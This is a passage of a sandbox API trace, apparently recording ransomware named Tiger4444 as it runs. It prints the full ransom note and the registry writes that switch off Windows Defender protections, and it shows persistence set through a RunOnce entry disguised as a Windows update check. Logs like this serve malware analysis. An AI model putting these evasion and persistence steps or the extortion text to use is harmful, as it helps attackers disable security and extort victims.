hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.800] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.800] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.801] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.801] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.801] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0031.801] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0031.802] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0031.802] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.802] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.802] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.802] SetLastError (dwErrCode=0x0) [0031.802] lstrlenA (lpString="Tiger4444\nHOW TO BACK YOUR FILES.txt\nNQDPDE\n") returned 44 [0031.802] lstrcpynA (in: lpString1=0xafe00c, lpString2="local", iMaxLength=148 | out: lpString1="local") returned="local" [0031.804] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= ") returned 1047 [0031.804] lstrlenA (lpString="{{ID}}") returned 6 [0031.804] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0031.804] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0031.804] CloseHandle (hObject=0x0) returned 0 [0031.804] CloseHandle (hObject=0x0) returned 0 [0031.804] GetSystemTime (in: lpSystemTime=0xc71254 | out: lpSystemTime=0xc71254*(wYear=0x7e3, wMonth=0x5, wDayOfWeek=0x6, wDay=0x12, wHour=0x6, wMinute=0x27, wSecond=0x27, wMilliseconds=0x387)) [0032.498] SetLastError (dwErrCode=0x6) [0032.498] lstrlenA (lpString="Tiger4444\nHOW TO BACK YOUR FILES.txt\nNQDPDE\n") returned 44 [0032.498] lstrcpynA (in: lpString1=0xafe00c, lpString2="network", iMaxLength=148 | out: lpString1="network") returned="network" [0032.499] lstrlenA (lpString="iC Gb VX Zh d4 dF EH lq R1 oD zQ zh dS Oc k3 dm\r\n9k Vz Az EZ Zx UB 9r Ud yE Oj Xr 4q 42 a+ zy a1\r\n9A 7g QA kp 6T FO KU Vd I/ PB 1A vf 1H gB gL h6\r\nK7 qa 0G A+ ox 7Q Vw Hx Dw 7/ EY 7n fC /C jg Lm\r\n5r F9 JX O0 Yd uw Gb wG wN sD 5N T0 xF 8x fu 2U\r\nLh zz qP Aj 9P Ye hF pg 6p u/ Vt 6V qW lB go OW\r\nA6 fm x8 AF lZ YU 38 Qs Jz 5w +u pA 8s Wh EW a8\r\n39 zI xh P2 Eg gh bv 9d YY lM gI tD As Ve tF Nq\r\nOU zf 6s wv gN dM V7 JJ y4 pt eT YQ 5m CD Y1 Wy\r\nO0 Zx PF SZ JM Pd hE 1d UX B4 st wV RF 84 vx G1\r\nGG m5 Da 96 K9 do bU 7s dF K/ 12 ls 43 cT NX f/\r\nH9 hP fy 99 3I 4Z Gt Ro jT 1N Bc OJ 7Q 4C Bj zq\r\neO f5 It Kn 1b Dm 3b QF ut zs /l az Tb UB 1h n7\r\nX+ UQ vQ QV dv kP 6D aG sh wM vN 1f y9 hY Es sK\r\ne3 I2 MI jG ae ed HV JY WP Kb G9 Cb XE tp Na Nr\r\nYw gK 0w cs Kc /b iT bF ks Gl hY uT rc 3F ms WJ\r\n4A RC Hf Y5 4M s6 go Q3 8q 81 CZ 87 Xu iK M8 tV\r\niY zx zi g4 wF nd 52 hA W4 6z vC YN UX 5c ez db\r\n7q l2 x7 XX OF vC Xf XH 6J uv 6o +E ba PE 7g O8\r\nji 2q Ck Jm 9h Fv Dp pE Yb gm y8 kC 8C bw Nd CE\r\nCi Oh 48 WT 28 IH rI Vt pa uN or 2M n+ Dy 1p iT\r\n+s XV rk iw Au 8= ") returned 1047 [0032.499] lstrlenA (lpString="{{ID}}") returned 6 [0032.499] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0032.499] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0032.499] CloseHandle (hObject=0x0) returned 0 [0032.499] CloseHandle (hObject=0x0) returned 0 [0032.499] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66800 [0032.499] RtlInitializeSListHead (in: ListHead=0xc66808 | out: ListHead=0xc66808) [0032.499] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc669c0 [0032.499] RtlInitializeSListHead (in: ListHead=0xc669c8 | out: ListHead=0xc669c8) [0032.499] GetEnvironmentVariableW (in: lpName="allusersprofile", lpBuffer=0x53b20, nSize=0x104 | out: lpBuffer="C:\\ProgramData") returned 0xe [0032.499] lstrlenW (lpString="C:\\ProgramData") returned 14 [0032.499] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0032.499] lstrcatW (in: lpString1="", lpString2="\\local" | out: lpString1="\\local") returned="\\local" [0032.499] CreateDirectoryW (lpPathName="C:\\ProgramData\\local" (normalized: "c:\\programdata\\local"), lpSecurityAttributes=0x0) returned 1 [0032.501] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\local" | out: lpString1="C:\\ProgramData\\local") returned="C:\\ProgramData\\local" [0032.501] lstrcatW (in: lpString1="C:\\ProgramData\\local", lpString2="\\" | out: lpString1="C:\\ProgramData\\local\\") returned="C:\\ProgramData\\local\\" [0032.501] lstrcatW (in: lpString1="C:\\ProgramData\\local\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3") returned="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3" [0032.501] CreateFileW (lpFileName="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\programdata\\local\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x244 [0032.545] WriteFile (in: hFile=0x244, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0xafd0d0, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0xafd0d0*=0x3d4, lpOverlapped=0x0) returned 1 [0032.547] FlushFileBuffers (hFile=0x244) returned 1 [0032.550] SetFileAttributesW (lpFileName="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0032.551] CloseHandle (hObject=0x244) returned 1 [0032.552] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\local" | out: lpString1="C:\\ProgramData\\local") returned="C:\\ProgramData\\local" [0032.552] lstrcatW (in: lpString1="C:\\ProgramData\\local", lpString2="\\" | out: lpString1="C:\\ProgramData\\local\\") returned="C:\\ProgramData\\local\\" [0032.552] lstrcatW (in: lpString1="C:\\ProgramData\\local\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3") returned="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3" [0032.552] CreateFileW (lpFileName="C:\\ProgramData\\local\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\programdata\\local\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x244 [0032.552] ReadFile (in: hFile=0x244, lpBuffer=0xafccf8, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0xafccf4, lpOverlapped=0x0 | out: lpBuffer=0xafccf8*, lpNumberOfBytesRead=0xafccf4*=0x3d4, lpOverlapped=0x0) returned 1 [0032.552] CloseHandle (hObject=0x244) returned 1 [0032.552] GetLastError () returned 0x0 [0032.552] lstrcatW (in: lpString1="", lpString2="\\share" | out: lpString1="\\share") returned="\\share" [0032.552] CreateDirectoryW (lpPathName="C:\\ProgramData\\share" (normalized: "c:\\programdata\\share"), lpSecurityAttributes=0x0) returned 1 [0032.552] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\share" | out: lpString1="C:\\ProgramData\\share") returned="C:\\ProgramData\\share" [0032.552] lstrcatW (in: lpString1="C:\\ProgramData\\share", lpString2="\\" | out: lpString1="C:\\ProgramData\\share\\") returned="C:\\ProgramData\\share\\" [0032.552] lstrcatW (in: lpString1="C:\\ProgramData\\share\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3") returned="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3" [0032.552] CreateFileW (lpFileName="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\programdata\\share\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x244 [0032.553] WriteFile (in: hFile=0x244, lpBuffer=0xc70e94*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0xafd0d0, lpOverlapped=0x0 | out: lpBuffer=0xc70e94*, lpNumberOfBytesWritten=0xafd0d0*=0x3d4, lpOverlapped=0x0) returned 1 [0032.555] FlushFileBuffers (hFile=0x244) returned 1 [0032.577] SetFileAttributesW (lpFileName="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0032.578] CloseHandle (hObject=0x244) returned 1 [0032.579] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\share" | out: lpString1="C:\\ProgramData\\share") returned="C:\\ProgramData\\share" [0032.579] lstrcatW (in: lpString1="C:\\ProgramData\\share", lpString2="\\" | out: lpString1="C:\\ProgramData\\share\\") returned="C:\\ProgramData\\share\\" [0032.579] lstrcatW (in: lpString1="C:\\ProgramData\\share\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3") returned="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3" [0032.579] CreateFileW (lpFileName="C:\\ProgramData\\share\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\programdata\\share\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x244 [0032.579] ReadFile (in: hFile=0x244, lpBuffer=0xafccf8, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0xafccf4, lpOverlapped=0x0 | out: lpBuffer=0xafccf8*, lpNumberOfBytesRead=0xafccf4*=0x3d4, lpOverlapped=0x0) returned 1 [0032.579] CloseHandle (hObject=0x244) returned 1 [0032.579] GetLastError () returned 0x0 [0032.579] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\HomeGroup", phkResult=0xafe0d4 | out: phkResult=0xafe0d4*=0x244) returned 0x0 [0032.582] RegSetValueExW (in: hKey=0x244, lpValueName="DisableHomeGroup", Reserved=0x0, dwType=0x4, lpData=0xafe0d0*=0x1, cbData=0x4 | out: lpData=0xafe0d0*=0x1) returned 0x0 [0032.582] RegCloseKey (hKey=0x244) returned 0x0 [0032.582] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", phkResult=0xafe0d4 | out: phkResult=0xafe0d4*=0x244) returned 0x0 [0032.582] RegSetValueExW (in: hKey=0x244, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0xafe0d0*=0x1, cbData=0x4 | out: lpData=0xafe0d0*=0x1) returned 0x0 [0032.582] RegCloseKey (hKey=0x244) returned 0x0 [0032.582] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Policy Manager", phkResult=0xafe0d4 | out: phkResult=0xafe0d4*=0x244) returned 0x0 [0032.582] RegCloseKey (hKey=0x244) returned 0x0 [0032.582] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", phkResult=0xafe0d4 | out: phkResult=0xafe0d4*=0x244) returned 0x0 [0032.583] RegSetValueExW (in: hKey=0x244, lpValueName="DisableRealtimeMonitoring", Reserved=0x0, dwType=0x4, lpData=0xafe0d0*=0x1, cbData=0x4 | out: lpData=0xafe0d0*=0x1) returned 0x0 [0032.583] RegSetValueExW (in: hKey=0x244, lpValueName="DisableBehaviorMonitoring", Reserved=0x0, dwType=0x4, lpData=0xafe0d0*=0x1, cbData=0x4 | out: lpData=0xafe0d0*=0x1) returned 0x0 [0032.583] RegSetValueExW (in: hKey=0x244, lpValueName="DisableOnAccessProtection", Reserved=0x0, dwType=0x4, lpData=0xafe0d0*=0x1, cbData=0x4 | out: lpData=0xafe0d0*=0x1) returned 0x0 [0032.583] RegCloseKey (hKey=0x244) returned 0x0 [0032.583] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", phkResult=0xafe1bc | out: phkResult=0xafe1bc*=0x248) returned 0x0 [0032.583] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe") returned 37 [0032.583] RegSetValueExW (in: hKey=0x248, lpValueName="WindowsUpdateCheck", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe", cbData=0x4a | out: lpData="C:\\Users\\FD1HVy\\Desktop\\Tiger4444.exe") returned 0x0 [0032.583] RegCloseKey (hKey=0x248) returned 0x0 [0032.583] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x1c) returned 0xc6fb00 [0032.583] GetLastError () returned 0x0 [0032.583] SetLastError (dwErrCode=0x0) [0032.583] GetLastError () returned 0x0 [0032.583] SetLastError (dwErrCode=0x0) [0032.583] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x75e90000 [0032.583] GetProcAddress (hModule=0x75e90000, lpProcName="AreFileApisANSI") returned 0x75ea4280 [0032.584] AreFileApisANSI () returned 1 [0032.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc6fb00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0032.584] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x38) returned 0xc73048 [0032.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc6fb00, cbMultiByte=-1, lpWideCharStr=0xc73048, cchWideChar=28 | out: lpWideCharStr="C:\\WINDOWS\\system32\\cmd.exe") returned 28 